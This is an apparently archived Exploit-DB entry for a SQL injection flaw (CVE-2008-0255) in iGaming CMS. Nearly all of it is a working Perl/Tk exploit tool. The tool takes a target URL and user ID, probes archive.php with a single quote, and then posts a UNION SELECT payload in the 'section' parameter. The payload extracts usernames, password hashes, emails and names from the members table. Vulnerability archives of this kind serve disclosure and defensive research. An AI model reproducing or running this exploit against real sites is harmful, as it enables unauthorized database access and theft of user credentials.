iGaming CMS <= 1.3.1/1.5 - Remote SQL Injection Exploit

2008-01-11T00:00:00
ID EDB-ID:4886
Type exploitdb
Reporter Eugene Minaev
Modified 2008-01-11T00:00:00

Description

iGaming CMS <= 1.3.1/1.5 Remote SQL Injection Exploit. CVE-2008-0255. Webapps exploit for php platform

                                        
                                            #!/usr/bin/perl

	use Tk;
	use Tk::BrowseEntry;
	use Tk::DialogBox;
	use LWP::UserAgent;

	$mw = new MainWindow(title =&gt; "UnderWHAT?!" );

	$mw-&gt;geometry ( '395x180' ) ;
	$mw-&gt;resizable(0,0);

	$mw-&gt;Label(-text =&gt; '', -font =&gt; '{Verdana} 2',-foreground=&gt;'red')-&gt;pack();
	$mw-&gt;Label(-text =&gt; 'iGaming cms &lt;= 1.3.1 Remote Sql Injection', -font =&gt; '{Tahoma} 7 bold',-foreground=&gt;'red')-&gt;pack();
	$mw-&gt;Label(-text =&gt; 'found by gemaglabin [ mafia of antichat ]', -font =&gt; '{Tahoma} 7 bold',-foreground=&gt;'red')-&gt;pack();
	$mw-&gt;Label(-text =&gt; '', -font =&gt; '{Tahoma} 2 bold',-foreground=&gt;'red')-&gt;pack();


	$fleft  = $mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'ne') ;
	$fright = $mw-&gt;Frame()-&gt;pack ( -side =&gt; 'left', -anchor =&gt; 'nw') ;

	$url      = 'http://test2.ru/igaming/';
	$user_id  = '1';
	$prefix   = 'sp_';
	$table    = 'users';
	$report   = '';
	


	$fleft-&gt;Label ( -text =&gt; 'Path to site index: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
	$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$url) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

	$fleft-&gt;Label ( -text =&gt; 'User ID: ', -font =&gt; '{Verdana} 8 bold' ) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
	$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$user_id) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

	$fleft-&gt;Label ( -text =&gt; 'Returned data: ', -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
	$fright-&gt;Entry ( -relief =&gt; "groove", -width =&gt; 35, -font =&gt; '{Verdana} 8', -textvariable =&gt; \$hash) -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'w' ) ;

	$fright-&gt;Label( -text =&gt; ' ')-&gt;pack();
	$fleft-&gt;Label( -text =&gt; ' ')-&gt;pack();
	
	$fleft-&gt;Label ( -text =&gt; "Test site vulnerability", -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
	$fright-&gt;Button(-text    =&gt; "Test site vulnerability",
	                -relief =&gt; "groove",
	                -width =&gt; '30',
	                -font =&gt; '{Verdana} 8 bold',
	                -activeforeground =&gt; 'red',
	                -command =&gt; \&test_vuln
	               )-&gt;pack();
				   
				   
	$fleft-&gt;Label ( -text =&gt; "Get all possible data ", -font =&gt; '{Verdana} 8 bold') -&gt;pack ( -side =&gt; "top" , -anchor =&gt; 'e' ) ;
	$fright-&gt;Button(-text    =&gt; 'Get data from database',
	                -relief =&gt; "groove",
	                -width =&gt; '30',
	                -font =&gt; '{Verdana} 8 bold',
	                -activeforeground =&gt; 'red',
	                -command =&gt; \&get_hash
	               )-&gt;pack();
				  
	
	MainLoop();
	
	sub get_hash()
	{
		$xpl = LWP::UserAgent-&gt;new( ) or die;
		$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'get hash from database', -buttons =&gt; ["OK"]);
		$res = $xpl-&gt;post($url."archive.php",['section'=&gt;'-1 union select 1,2,concat_ws(char(32),pseudo,pass,email,nom),4 from '.$prefix.'members where id='.$user_id.'/*']);
		if($res-&gt;as_string =~ /Date Posted: (.*)&lt;/)
		{
			$hash = $1;
		}
	}

	 
	sub test_vuln()
	{
		$InfoWindow=$mw-&gt;DialogBox(-title   =&gt; 'test site vulnerability', -buttons =&gt; ["OK"]);
		$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
		$InfoWindow-&gt;add('Label', -text =&gt; $url, -font =&gt; '{Verdana} 8')-&gt;pack;
		$InfoWindow-&gt;add('Label', -text =&gt; '', -font =&gt; '{Verdana} 8')-&gt;pack;
		$xpl = LWP::UserAgent-&gt;new( ) or die;
		$res = $xpl-&gt;post($url."archive.php",['section'=&gt;"'"]);
		if($res-&gt;as_string =~ /Fatal error/i ) { $hash='SITE VULNERABLE'}
		else { $hash = 'SITE UNVULNERABLE'} 
	}

# milw0rm.com [2008-01-11]